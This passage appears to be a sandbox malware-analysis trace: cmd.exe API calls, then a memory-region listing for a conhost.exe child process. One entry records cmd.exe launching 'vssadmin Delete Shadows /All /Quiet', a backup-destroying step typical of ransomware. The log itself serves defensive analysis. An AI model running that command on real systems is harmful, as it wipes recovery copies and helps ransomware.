	[0274.266] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0274.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0274.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0274.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0274.266] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0274.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0274.268] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0274.269] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0274.269] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0274.269] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0274.269] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0274.269] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0274.269] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0274.269] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0274.269] GetProcessHeap () returned 0x47c0000
	[0274.269] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c79b8) returned 1
	[0274.269] GetProcessHeap () returned 0x47c0000
	[0274.269] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xa) returned 0x47c9558
	[0274.270] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0274.277] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=N: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f518*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=N: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f564 | out: lpCommandLine="vssadmin  Delete Shadows /For=N: /All /Quiet ", lpProcessInformation=0x18f564*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xbd0, dwThreadId=0x338)) returned 1
	[0274.304] CloseHandle (hObject=0xa4) returned 1
	[0274.304] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0274.304] GetProcessHeap () returned 0x47c0000
	[0274.304] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cb858) returned 1
	[0274.304] GetEnvironmentStringsW () returned 0x47ca148*
	[0274.304] GetProcessHeap () returned 0x47c0000
	[0274.305] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xb9c) returned 0x47cacf0
	[0274.305] memcpy (in: _Dst=0x47cacf0, _Src=0x47ca148, _Size=0xb9c | out: _Dst=0x47cacf0) returned 0x47cacf0
	[0274.305] FreeEnvironmentStringsA (penv="=") returned 1
	[0274.305] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0294.545] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f4fc | out: lpExitCode=0x18f4fc*=0x2) returned 1
	[0294.547] CloseHandle (hObject=0xa8) returned 1
	[0294.549] _vsnwprintf (in: _Buffer=0x18f5e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f504 | out: _Buffer="00000002") returned 8
	[0294.550] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0294.551] GetProcessHeap () returned 0x47c0000
	[0294.551] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cacf0) returned 1
	[0294.551] GetEnvironmentStringsW () returned 0x47ca148*
	[0294.551] GetProcessHeap () returned 0x47c0000
	[0294.551] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xbc2) returned 0x47cc468
	[0294.552] memcpy (in: _Dst=0x47cc468, _Src=0x47ca148, _Size=0xbc2 | out: _Dst=0x47cc468) returned 0x47cc468
	[0294.552] FreeEnvironmentStringsA (penv="=") returned 1
	[0294.552] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0294.552] GetProcessHeap () returned 0x47c0000
	[0294.552] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cc468) returned 1
	[0294.553] GetEnvironmentStringsW () returned 0x47ca148*
	[0294.553] GetProcessHeap () returned 0x47c0000
	[0294.553] RtlAllocateHeap (HeapHandle=0x47c0000, Flags=0x8, Size=0xbc2) returned 0x47cc468
	[0294.553] memcpy (in: _Dst=0x47cc468, _Src=0x47ca148, _Size=0xbc2 | out: _Dst=0x47cc468) returned 0x47cc468
	[0294.553] FreeEnvironmentStringsA (penv="=") returned 1
	[0294.553] GetProcessHeap () returned 0x47c0000
	[0294.553] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9558) returned 1
	[0294.554] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f590 | out: lpAttributeList=0x18f590) 
	[0294.554] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0294.554] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0295.032] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0295.032] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0295.321] _get_osfhandle (_FileHandle=0) returned 0x38
	[0295.321] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0295.684] SetConsoleInputExeNameW () returned 0x1
	[0295.684] GetConsoleOutputCP () returned 0x1b5
	[0296.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0296.074] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0296.499] exit (_Code=2) 

Thread:
	id = 296
	os_tid = 0x1340


Process:
	id = "48"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2e8b5000"
	os_pid = "0x4a8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "47"
	os_parent_pid = "0x10a4"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3622
	        start_va = 0x2be00000
	          end_va = 0x2bffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000002be00000"
	        filename = ""

Region:
	              id = 3623
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3624
	        start_va = 0xa8ebc80000
	          end_va = 0xa8ebcbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a8ebc80000"
	        filename = ""

Region:
	              id = 3625
	        start_va = 0xa8ebe00000
	          end_va = 0xa8ebffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a8ebe00000"
	        filename = ""

Region:
	              id = 3626
	        start_va = 0x1e2a27e0000
	          end_va = 0x1e2a27fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a27e0000"
	        filename = ""

Region:
	              id = 3627
	        start_va = 0x1e2a2800000
	          end_va = 0x1e2a2814fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2800000"
	        filename = ""

Region:
	              id = 3628
	        start_va = 0x7df5ff530000
	          end_va = 0x7ff5ff52ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff530000"
	        filename = ""

Region:
	              id = 3629
	        start_va = 0x7ff7ffa10000
	          end_va = 0x7ff7ffa32fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ffa10000"
	        filename = ""

Region:
	              id = 3630
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 3631
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3632
	        start_va = 0x1e2a2820000
	          end_va = 0x1e2a296ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a2820000"
	        filename = ""

Region:
	              id = 3637
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 3638
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 3639
	        start_va = 0x1e2a27e0000
	          end_va = 0x1e2a27effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a27e0000"
	        filename = ""

Region:
	              id = 3640
	        start_va = 0x7ff7ff910000
	          end_va = 0x7ff7ffa0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff910000"
	        filename = ""

Region:
	              id = 3641
	        start_va = 0x1e2a2970000
	          end_va = 0x1e2a2a2dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3642
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 3643
	        start_va = 0xa8ebcc0000
	          end_va = 0xa8ebcfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a8ebcc0000"
	        filename = ""

Region:
	              id = 3644
	        start_va = 0x1e2a2a30000
	          end_va = 0x1e2a2abffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a2a30000"
	        filename = ""

Region:
	              id = 3645
	        start_va = 0x1e2a27f0000
	          end_va = 0x1e2a27f6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a27f0000"
	        filename = ""

Region:
	              id = 3646
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 3647
	        start_va = 0x1e2a2820000
	          end_va = 0x1e2a2820fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2820000"
	        filename = ""

Region:
	              id = 3648
	        start_va = 0x1e2a2870000
	          end_va = 0x1e2a296ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a2870000"
	        filename = ""

Region:
	              id = 3649
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 3650
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 3651
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 3652
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 3653
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 3654
	        start_va = 0x1e2a2830000
	          end_va = 0x1e2a2836fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a2830000"
	        filename = ""

Region:
	              id = 3655
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 3656
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 3657
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 3658
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 3659
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 3660
	        start_va = 0x1e2a2840000
	          end_va = 0x1e2a2840fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a2840000"
	        filename = ""

Region:
	              id = 3661
	        start_va = 0x1e2a2850000
	          end_va = 0x1e2a2850fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a2850000"
	        filename = ""

Region:
	              id = 3662
	        start_va = 0x1e2a2ac0000
	          end_va = 0x1e2a2c47fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2ac0000"
	        filename = ""

Region:
	              id = 3663
	        start_va = 0x1e2a2c50000
	          end_va = 0x1e2a2dd0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2c50000"
	        filename = ""

Region:
	              id = 3664
	        start_va = 0x1e2a2de0000
	          end_va = 0x1e2a41dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2de0000"
	        filename = ""

Region:
	              id = 3665
	        start_va = 0x1e2a41e0000
	          end_va = 0x1e2a429ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a41e0000"
	        filename = ""

Region:
	              id = 3666
	        start_va = 0xa8ebd00000
	          end_va = 0xa8ebd3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a8ebd00000"
	        filename = ""

Region:
	              id = 3667
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 3668
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 3670
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 3671
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 3672
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 3673
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 3674
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 3679
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 3680
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 3681
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 3682
	        start_va = 0x1e2a42a0000
	          end_va = 0x1e2a435ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a42a0000"
	        filename = ""

Region:
	              id = 3683
	        start_va = 0x1e2a4360000
	          end_va = 0x1e2a4696fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 3684
	        start_va = 0x1e2a2a30000
	          end_va = 0x1e2a2a89fff
	       monitored = 1
	     entry_point = 0x1e2a2a453f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 3685
	        start_va = 0x1e2a2ab0000
	          end_va = 0x1e2a2abffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a2ab0000"
	        filename = ""

Region:
	              id = 3686
	        start_va = 0x1e2a41e0000
	          end_va = 0x1e2a4200fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 3687
	        start_va = 0x1e2a4290000
	          end_va = 0x1e2a429ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a4290000"
	        filename = ""

Region:
	              id = 3689
	        start_va = 0x1e2a46a0000
	          end_va = 0x1e2a48b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a46a0000"
	        filename = ""

Region:
	              id = 3690
	        start_va = 0x1e2a48c0000
	          end_va = 0x1e2a4addfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a48c0000"
	        filename = ""

Region:
	              id = 3698
	        start_va = 0x1e2a4ae0000
	          end_va = 0x1e2a4bf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a4ae0000"
	        filename = ""

Region:
	              id = 3699
	        start_va = 0x1e2a4c00000
	          end_va = 0x1e2a4e1dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a4c00000"
	        filename = ""

Region:
	              id = 3700
	        start_va = 0x1e2a4e20000
	          end_va = 0x1e2a4f2cfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a4e20000"
	        filename = ""

Region:
	              id = 3705
	        start_va = 0xa8ebd40000
	          end_va = 0xa8ebd7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a8ebd40000"
	        filename = ""

Region:
	              id = 3706
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 3707
	        start_va = 0x1e2a2860000
	          end_va = 0x1e2a2860fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2860000"
	        filename = ""

Region:
	              id = 3708
	        start_va = 0x1e2a4f30000
	          end_va = 0x1e2a4febfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a4f30000"
	        filename = ""

Region:
	              id = 3709
	        start_va = 0x1e2a2860000
	          end_va = 0x1e2a2863fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2860000"
	        filename = ""

Region:
	              id = 3710
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 3711
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 3712
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 3713
	        start_va = 0x1e2a2a30000
	          end_va = 0x1e2a2a36fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e2a2a30000"
	        filename = ""

Region:
	              id = 3714
	        start_va = 0x1e2a2a40000
	          end_va = 0x1e2a2a40fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2a40000"
	        filename = ""

Region:
	              id = 3715
	        start_va = 0x1e2a2a50000
	          end_va = 0x1e2a2a50fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2a50000"
	        filename = ""

Region:
	              id = 3716
	        start_va = 0x1e2a2a60000
	          end_va = 0x1e2a2a64fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 3719
	        start_va = 0x1e2a2a70000
	          end_va = 0x1e2a2a70fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 3740
	        start_va = 0x1e2a2a80000
